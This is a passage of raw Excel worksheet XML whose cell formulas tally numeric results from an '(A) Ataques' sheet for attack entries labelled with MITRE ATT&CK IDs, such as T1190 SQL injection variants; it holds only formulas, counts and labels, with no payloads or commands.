        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BR40,"")</f>
        <v>9</v>
      </c>
      <c r="S40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BS40,"")</f>
        <v>38</v>
      </c>
      <c r="T40" s="530">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($P40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BT40,"")</f>
        <v>124</v>
      </c>
      <c r="V40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BV40,"")</f>
        <v>114</v>
      </c>
      <c r="W40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BX40,"")</f>
        <v>6</v>
      </c>
      <c r="X40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BY40,"")</f>
        <v>44</v>
      </c>
      <c r="Y40" s="532">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($U40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z40" s="288">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!BZ40,"")</f>
        <v>74</v>
      </c>
      <c r="AA40" s="392">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!CB40,"")</f>
        <v>72</v>
      </c>
      <c r="AB40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!CD40,"")</f>
        <v>10</v>
      </c>
      <c r="AC40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!CE40,"")</f>
        <v>32</v>
      </c>
      <c r="AD40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF(Z40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CF40,"")</f>
        <v>164</v>
      </c>
      <c r="AF40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CH40,"")</f>
        <v>153</v>
      </c>
      <c r="AG40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CJ40,"")</f>
        <v>14</v>
      </c>
      <c r="AH40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CK40,"")</f>
        <v>44</v>
      </c>
      <c r="AI40" s="287">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($AE40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ40" s="292">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CL40,"")</f>
        <v>0</v>
      </c>
      <c r="AK40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CN40,"")</f>
        <v>0</v>
      </c>
      <c r="AL40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CP40,"")</f>
        <v>0</v>
      </c>
      <c r="AM40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CQ40,"")</f>
        <v>0</v>
      </c>
      <c r="AN40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($AJ40=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CR40,"")</f>
        <v>0</v>
      </c>
      <c r="AP40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CT40,"")</f>
        <v>0</v>
      </c>
      <c r="AQ40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CV40,"")</f>
        <v>0</v>
      </c>
      <c r="AR40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$CW40,"")</f>
        <v>0</v>
      </c>
      <c r="AS40" s="287">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($AO40=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT40" s="288">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!CX40,"")</f>
        <v>106</v>
      </c>
      <c r="AU40" s="392">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!CZ40,"")</f>
        <v>102</v>
      </c>
      <c r="AV40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!DB40,"")</f>
        <v>9</v>
      </c>
      <c r="AW40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!DC40,"")</f>
        <v>38</v>
      </c>
      <c r="AX40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($AT40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY40" s="469">
        <f>'(A) Ataques'!LU40+'(A) Ataques'!MA40+'(A) Ataques'!MG40+'(A) Ataques'!MM40+'(A) Ataques'!MS40</f>
        <v>49</v>
      </c>
      <c r="AZ40" s="510">
        <f>'(A) Ataques'!LW40+'(A) Ataques'!MC40+'(A) Ataques'!MI40+'(A) Ataques'!MO40+'(A) Ataques'!MU40</f>
        <v>47</v>
      </c>
      <c r="BA40" s="471">
        <f>'(A) Ataques'!LY40+'(A) Ataques'!ME40+'(A) Ataques'!MK40+'(A) Ataques'!MQ40+'(A) Ataques'!MW40</f>
        <v>2</v>
      </c>
      <c r="BB40" s="471">
        <f>'(A) Ataques'!LQ40</f>
        <v>35</v>
      </c>
      <c r="BC40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($AY40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD40" s="469">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!LL40,"")</f>
        <v>137</v>
      </c>
      <c r="BE40" s="510">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!LM40,"")</f>
        <v>135</v>
      </c>
      <c r="BF40" s="471">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!LN40,"")</f>
        <v>2</v>
      </c>
      <c r="BG40" s="471">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!LO40,"")</f>
        <v>2</v>
      </c>
      <c r="BH40" s="471">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!LS40,"")</f>
        <v>44</v>
      </c>
      <c r="BI40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($BD40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ40" s="469">
        <f>'(A) Ataques'!OL40+'(A) Ataques'!OR40+'(A) Ataques'!OX40+'(A) Ataques'!PD40+'(A) Ataques'!PJ40</f>
        <v>82</v>
      </c>
      <c r="BK40" s="510">
        <f>'(A) Ataques'!ON40+'(A) Ataques'!OT40+'(A) Ataques'!OZ40+'(A) Ataques'!PF40+'(A) Ataques'!PL40</f>
        <v>79</v>
      </c>
      <c r="BL40" s="471">
        <f>'(A) Ataques'!OP40+'(A) Ataques'!OV40+'(A) Ataques'!PB40+'(A) Ataques'!PH40+'(A) Ataques'!PN40</f>
        <v>6</v>
      </c>
      <c r="BM40" s="495">
        <f>'(A) Ataques'!OH40</f>
        <v>44</v>
      </c>
      <c r="BN40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($BJ40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO40" s="469">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!OC40,"")</f>
        <v>82</v>
      </c>
      <c r="BP40" s="510">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!OD40,"")</f>
        <v>79</v>
      </c>
      <c r="BQ40" s="471">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!OE40,"")</f>
        <v>6</v>
      </c>
      <c r="BR40" s="471">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!OF40,"")</f>
        <v>1</v>
      </c>
      <c r="BS40" s="471">
        <f>IF('(A) Ataques'!$AP40&lt;&gt;"NO",'(A) Ataques'!OJ40,"")</f>
        <v>44</v>
      </c>
      <c r="BT40" s="331">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($BO40=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A41" s="79">
        <f t="shared" si="0"/>
        <v>39</v>
      </c>
      <c r="B41" s="4">
        <f>IF('(A) Ataques'!AK41&lt;&gt;"NO",'(A) Ataques'!E41,"")</f>
        <v>32</v>
      </c>
      <c r="C41" s="6" t="str">
        <f>IF('(A) Ataques'!AK41&lt;&gt;"NO",IF('(A) Ataques'!M41="","",'(A) Ataques'!M41),"")</f>
        <v>T1190-Sql_inyection1</v>
      </c>
      <c r="D41" s="4" t="str">
        <f>IF('(A) Ataques'!AK41&lt;&gt;"NO",'(A) Ataques'!F41,"")</f>
        <v>T1190</v>
      </c>
      <c r="E41" s="286">
        <f>IF('(A) Ataques'!AK41&lt;&gt;"NO",'(A) Ataques'!AQ41,"")</f>
        <v>50</v>
      </c>
      <c r="F41" s="288">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!BB41,"")</f>
        <v>0</v>
      </c>
      <c r="G41" s="392">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!BD41,"")</f>
        <v>0</v>
      </c>
      <c r="H41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!BF41,"")</f>
        <v>0</v>
      </c>
      <c r="I41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!BG41,"")</f>
        <v>0</v>
      </c>
      <c r="J41" s="530">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($F41=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BH41,"")</f>
        <v>1</v>
      </c>
      <c r="L41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BJ41,"")</f>
        <v>1</v>
      </c>
      <c r="M41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BL41,"")</f>
        <v>1</v>
      </c>
      <c r="N41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BM41,"")</f>
        <v>1</v>
      </c>
      <c r="O41" s="532">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($K41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P41" s="292">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BN41,"")</f>
        <v>1</v>
      </c>
      <c r="Q41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BP41,"")</f>
        <v>1</v>
      </c>
      <c r="R41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BR41,"")</f>
        <v>1</v>
      </c>
      <c r="S41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BS41,"")</f>
        <v>1</v>
      </c>
      <c r="T41" s="530">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($P41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BT41,"")</f>
        <v>2</v>
      </c>
      <c r="V41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BV41,"")</f>
        <v>1</v>
      </c>
      <c r="W41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BX41,"")</f>
        <v>1</v>
      </c>
      <c r="X41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$BY41,"")</f>
        <v>1</v>
      </c>
      <c r="Y41" s="532">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($U41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z41" s="288">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!BZ41,"")</f>
        <v>5</v>
      </c>
      <c r="AA41" s="392">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!CB41,"")</f>
        <v>3</v>
      </c>
      <c r="AB41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!CD41,"")</f>
        <v>3</v>
      </c>
      <c r="AC41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!CE41,"")</f>
        <v>1</v>
      </c>
      <c r="AD41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF(Z41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CF41,"")</f>
        <v>6</v>
      </c>
      <c r="AF41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CH41,"")</f>
        <v>3</v>
      </c>
      <c r="AG41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CJ41,"")</f>
        <v>3</v>
      </c>
      <c r="AH41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CK41,"")</f>
        <v>1</v>
      </c>
      <c r="AI41" s="287">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($AE41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ41" s="292">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CL41,"")</f>
        <v>0</v>
      </c>
      <c r="AK41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CN41,"")</f>
        <v>0</v>
      </c>
      <c r="AL41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CP41,"")</f>
        <v>0</v>
      </c>
      <c r="AM41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CQ41,"")</f>
        <v>0</v>
      </c>
      <c r="AN41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($AJ41=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CR41,"")</f>
        <v>0</v>
      </c>
      <c r="AP41" s="322">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CT41,"")</f>
        <v>0</v>
      </c>
      <c r="AQ41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CV41,"")</f>
        <v>0</v>
      </c>
      <c r="AR41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!$CW41,"")</f>
        <v>0</v>
      </c>
      <c r="AS41" s="287">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($AO41=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT41" s="288">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!CX41,"")</f>
        <v>1</v>
      </c>
      <c r="AU41" s="392">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!CZ41,"")</f>
        <v>1</v>
      </c>
      <c r="AV41" s="4">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!DB41,"")</f>
        <v>1</v>
      </c>
      <c r="AW41" s="20">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",'(A) Ataques'!DC41,"")</f>
        <v>1</v>
      </c>
      <c r="AX41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($AT41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY41" s="469">
        <f>'(A) Ataques'!LU41+'(A) Ataques'!MA41+'(A) Ataques'!MG41+'(A) Ataques'!MM41+'(A) Ataques'!MS41</f>
        <v>1</v>
      </c>
      <c r="AZ41" s="510">
        <f>'(A) Ataques'!LW41+'(A) Ataques'!MC41+'(A) Ataques'!MI41+'(A) Ataques'!MO41+'(A) Ataques'!MU41</f>
        <v>1</v>
      </c>
      <c r="BA41" s="471">
        <f>'(A) Ataques'!LY41+'(A) Ataques'!ME41+'(A) Ataques'!MK41+'(A) Ataques'!MQ41+'(A) Ataques'!MW41</f>
        <v>1</v>
      </c>
      <c r="BB41" s="471">
        <f>'(A) Ataques'!LQ41</f>
        <v>1</v>
      </c>
      <c r="BC41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($AY41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD41" s="469">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!LL41,"")</f>
        <v>3</v>
      </c>
      <c r="BE41" s="510">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!LM41,"")</f>
        <v>3</v>
      </c>
      <c r="BF41" s="471">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!LN41,"")</f>
        <v>1</v>
      </c>
      <c r="BG41" s="471">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!LO41,"")</f>
        <v>2</v>
      </c>
      <c r="BH41" s="471">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!LS41,"")</f>
        <v>1</v>
      </c>
      <c r="BI41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($BD41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ41" s="469">
        <f>'(A) Ataques'!OL41+'(A) Ataques'!OR41+'(A) Ataques'!OX41+'(A) Ataques'!PD41+'(A) Ataques'!PJ41</f>
        <v>3</v>
      </c>
      <c r="BK41" s="510">
        <f>'(A) Ataques'!ON41+'(A) Ataques'!OT41+'(A) Ataques'!OZ41+'(A) Ataques'!PF41+'(A) Ataques'!PL41</f>
        <v>2</v>
      </c>
      <c r="BL41" s="471">
        <f>'(A) Ataques'!OP41+'(A) Ataques'!OV41+'(A) Ataques'!PB41+'(A) Ataques'!PH41+'(A) Ataques'!PN41</f>
        <v>2</v>
      </c>
      <c r="BM41" s="495">
        <f>'(A) Ataques'!OH41</f>
        <v>1</v>
      </c>
      <c r="BN41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($BJ41=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO41" s="469">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!OC41,"")</f>
        <v>3</v>
      </c>
      <c r="BP41" s="510">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!OD41,"")</f>
        <v>2</v>
      </c>
      <c r="BQ41" s="471">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!OE41,"")</f>
        <v>2</v>
      </c>
      <c r="BR41" s="471">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!OF41,"")</f>
        <v>1</v>
      </c>
      <c r="BS41" s="471">
        <f>IF('(A) Ataques'!$AP41&lt;&gt;"NO",'(A) Ataques'!OJ41,"")</f>
        <v>1</v>
      </c>
      <c r="BT41" s="331">
        <f>IF('(A) Ataques'!$AK41&lt;&gt;"NO",IF($BO41=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A42" s="79">
        <f t="shared" si="0"/>
        <v>40</v>
      </c>
      <c r="B42" s="4">
        <f>IF('(A) Ataques'!AK42&lt;&gt;"NO",'(A) Ataques'!E42,"")</f>
        <v>32</v>
      </c>
      <c r="C42" s="6" t="str">
        <f>IF('(A) Ataques'!AK42&lt;&gt;"NO",IF('(A) Ataques'!M42="","",'(A) Ataques'!M42),"")</f>
        <v>T1190-SQL_Injection_High_Bytes1</v>
      </c>
      <c r="D42" s="4" t="str">
        <f>IF('(A) Ataques'!AK42&lt;&gt;"NO",'(A) Ataques'!F42,"")</f>
        <v>T1190</v>
      </c>
      <c r="E42" s="286">
        <f>IF('(A) Ataques'!AK42&lt;&gt;"NO",'(A) Ataques'!AQ42,"")</f>
        <v>1</v>
      </c>
      <c r="F42" s="288">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!BB42,"")</f>
        <v>2</v>
      </c>
      <c r="G42" s="392">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!BD42,"")</f>
        <v>2</v>
      </c>
      <c r="H42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!BF42,"")</f>
        <v>2</v>
      </c>
      <c r="I42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!BG42,"")</f>
        <v>1</v>
      </c>
      <c r="J42" s="530">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($F42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BH42,"")</f>
        <v>2</v>
      </c>
      <c r="L42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BJ42,"")</f>
        <v>2</v>
      </c>
      <c r="M42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BL42,"")</f>
        <v>2</v>
      </c>
      <c r="N42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BM42,"")</f>
        <v>1</v>
      </c>
      <c r="O42" s="532">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($K42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P42" s="292">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BN42,"")</f>
        <v>4</v>
      </c>
      <c r="Q42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BP42,"")</f>
        <v>4</v>
      </c>
      <c r="R42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BR42,"")</f>
        <v>4</v>
      </c>
      <c r="S42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BS42,"")</f>
        <v>1</v>
      </c>
      <c r="T42" s="530">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($P42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BT42,"")</f>
        <v>7</v>
      </c>
      <c r="V42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BV42,"")</f>
        <v>7</v>
      </c>
      <c r="W42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BX42,"")</f>
        <v>7</v>
      </c>
      <c r="X42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$BY42,"")</f>
        <v>1</v>
      </c>
      <c r="Y42" s="532">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($U42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z42" s="288">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!BZ42,"")</f>
        <v>8</v>
      </c>
      <c r="AA42" s="392">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!CB42,"")</f>
        <v>5</v>
      </c>
      <c r="AB42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!CD42,"")</f>
        <v>5</v>
      </c>
      <c r="AC42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!CE42,"")</f>
        <v>1</v>
      </c>
      <c r="AD42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF(Z42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CF42,"")</f>
        <v>14</v>
      </c>
      <c r="AF42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CH42,"")</f>
        <v>12</v>
      </c>
      <c r="AG42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CJ42,"")</f>
        <v>12</v>
      </c>
      <c r="AH42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CK42,"")</f>
        <v>1</v>
      </c>
      <c r="AI42" s="287">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($AE42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ42" s="292">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CL42,"")</f>
        <v>0</v>
      </c>
      <c r="AK42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CN42,"")</f>
        <v>0</v>
      </c>
      <c r="AL42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CP42,"")</f>
        <v>0</v>
      </c>
      <c r="AM42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CQ42,"")</f>
        <v>0</v>
      </c>
      <c r="AN42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($AJ42=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CR42,"")</f>
        <v>1</v>
      </c>
      <c r="AP42" s="322">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CT42,"")</f>
        <v>1</v>
      </c>
      <c r="AQ42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CV42,"")</f>
        <v>1</v>
      </c>
      <c r="AR42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!$CW42,"")</f>
        <v>1</v>
      </c>
      <c r="AS42" s="287">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($AO42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT42" s="288">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!CX42,"")</f>
        <v>5</v>
      </c>
      <c r="AU42" s="392">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!CZ42,"")</f>
        <v>5</v>
      </c>
      <c r="AV42" s="4">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!DB42,"")</f>
        <v>5</v>
      </c>
      <c r="AW42" s="20">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",'(A) Ataques'!DC42,"")</f>
        <v>1</v>
      </c>
      <c r="AX42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($AT42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY42" s="469">
        <f>'(A) Ataques'!LU42+'(A) Ataques'!MA42+'(A) Ataques'!MG42+'(A) Ataques'!MM42+'(A) Ataques'!MS42</f>
        <v>1</v>
      </c>
      <c r="AZ42" s="510">
        <f>'(A) Ataques'!LW42+'(A) Ataques'!MC42+'(A) Ataques'!MI42+'(A) Ataques'!MO42+'(A) Ataques'!MU42</f>
        <v>1</v>
      </c>
      <c r="BA42" s="471">
        <f>'(A) Ataques'!LY42+'(A) Ataques'!ME42+'(A) Ataques'!MK42+'(A) Ataques'!MQ42+'(A) Ataques'!MW42</f>
        <v>1</v>
      </c>
      <c r="BB42" s="471">
        <f>'(A) Ataques'!LQ42</f>
        <v>1</v>
      </c>
      <c r="BC42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($AY42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD42" s="469">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!LL42,"")</f>
        <v>2</v>
      </c>
      <c r="BE42" s="510">
